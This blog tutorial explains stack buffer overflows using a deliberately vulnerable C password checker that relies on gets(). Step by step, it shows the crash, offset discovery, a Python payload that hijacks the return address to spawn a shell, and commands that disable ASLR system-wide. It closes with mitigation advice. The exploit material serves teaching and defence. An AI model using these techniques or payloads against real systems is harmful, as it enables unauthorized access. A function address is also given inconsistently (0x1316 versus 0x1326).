Cogs and Levers A blog full of technical stuff

Understanding Buffer Overrun Exploits

Introduction

Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.

Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.

In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.

Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.

Password Validator Example

In the following example, the program will ask for input from the user and validate it against a password stored on the server.

void do_super_admin_things() {
  system("/bin/sh");
}

int main(int argc, char *argv[]) {
  if (validate_password()) {
    do_super_admin_things();
  } else {
    printf("ERROR: Bad password\n");
  }

  return 0;
}

do_super_admin_things is our example. It might be an admin shell, or something else. The point is this program is trying to control access to that function by making sure you have the password, first!

The validate_password function is responsible for getting that password in from the outside world. It’s prompts, and then reads from stdin. Note the use of gets().

int validate_password() {
  char password_attempt[64];

  printf("What is the password? ");
  gets(password_attempt);

  return check_password(password_attempt);
}

Warning About gets

The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for it:

BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it has been deprecated from the C99 standard as per §7.26.13:

The gets function is obsolescent, and is deprecated.

If there’s one thing to learn from this section, it’s don’t use gets().

To get this code to compile, I had to relax some of the standard rules and mute certain warnings:

gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1 

Checking the Password

The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.

int check_password(char *attempt) {
  char password[256];
  int fd = 0;

  if ((fd = open("./the-password", O_RDONLY)) < 0) {
    perror("open");
    return 0;
  }

  ssize_t read_bytes = read(fd, password, 256);
  
  if (password[read_bytes - 1] == 0xa) {
    password[read_bytes - 1] = 0x0;
  }

  close(fd);

  return strncmp(password, attempt, strlen(password)) == 0;
}

Crashes

Initially, if you provide any normal input, the program behaves as expected:

What is the password? AAAAAAAAAAAA
ERROR: Bad password

But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1]    60406 segmentation fault (core dumped)  ./vuln1

The program crashes due to a segmentation fault. Checking dmesg gives us more information:

$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.

Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial parts of the stack, including the instruction pointer.

You can verify that 0x41 represents ‘A’ by running the following command:

echo -e "\x41\x41\x41\x41"
AAAA

Controlling the Instruction Pointer

This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable in the validate_password function, and in the stack, local variables are stored just below the return address. When password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control what address the CPU will jump to after validate_password finishes.

Maybe, we could find the address of the do_super_admin_things function and simply jump directly to it. In order to do this, we need to find the address. Only the name of the function is available to us in the source code, and the address
of the function is determined at compile time; so we need to lean on some other tools in order to gather this intel.

By using objdump we can take a look inside of the compiled executable and get this information.

objdump -d vuln1

This will decompile the vuln1 program and give us the location of each of the functions. We search for the function that we want (do_super_admin_things):

00001316 <do_super_admin_things>:
    1316:       55                      push   %ebp
    1317:       89 e5                   mov    %esp,%ebp
    1319:       53                      push   %ebx

We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.

Now we need to find the spot among that big group of A’s that we’re sending into the input, exactly where the right spot is, where we can inject our address onto the stack. We’ve already got some inside knowledge about our buffer. It’s 64 bytes in length.

We really need a magic mark in the input so we can determine where to send our address in. We can do that with some well known payload data. We re-run the program with our 64 A’s but we also add a pattern of characters afterwards:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1]    60406 segmentation fault (core dumped)  ./vuln1

This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in dmesg now:

[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)

The 45454545 tells us which part of the input is being sent in as the return address. \x45 is the E’s

echo -e "\x45\x45\x45\x45"
EEEE

That means that our instruction pointer will start at the E’s.

Prepare the Payload

To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using our function address from before.

#!/usr/bin/python
import sys

# fill out the original buffer
payload =  b"A" * 64
# extra pad to skip to where we want our instruction pointer 
payload += b"BBBBCCCCDDDD"
# address of our function "do_super_admin_things"
payload += b"\x16\x13\x00\x00"

sys.stdout.buffer.write(payload)

We can now inject this into the execution of our binary and achieve a shell:

$ (python3 payload.py; cat) | ./vuln1 

ls
input  payload.py  the-password  vuln1	vuln1.c

We use (python3 payload.py; cat) here because of the shell’s handling of file descriptors. Without doing this and simply piping the output, our shell would kill the file descriptors off.

Static vs. Runtime Addresses

When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.

For example, if we inspect the runtime address of 1do_super_admin_things` in GDB, we might see something like:

(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.

This differs from the objdump address 0x1326, as it’s been shifted by the base address of the executable (e.g., 0x56555000 in this case). This discrepancy is due to ASLR.

Temporarily Disabling ASLR for Demonstration

To ensure the addresses in objdump match those at runtime, we can temporarily disable ASLR. This makes the program load at consistent addresses, which is useful for demonstration and testing purposes.

To disable ASLR on Linux, run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Conclusion

In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.

Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.

Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.

Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.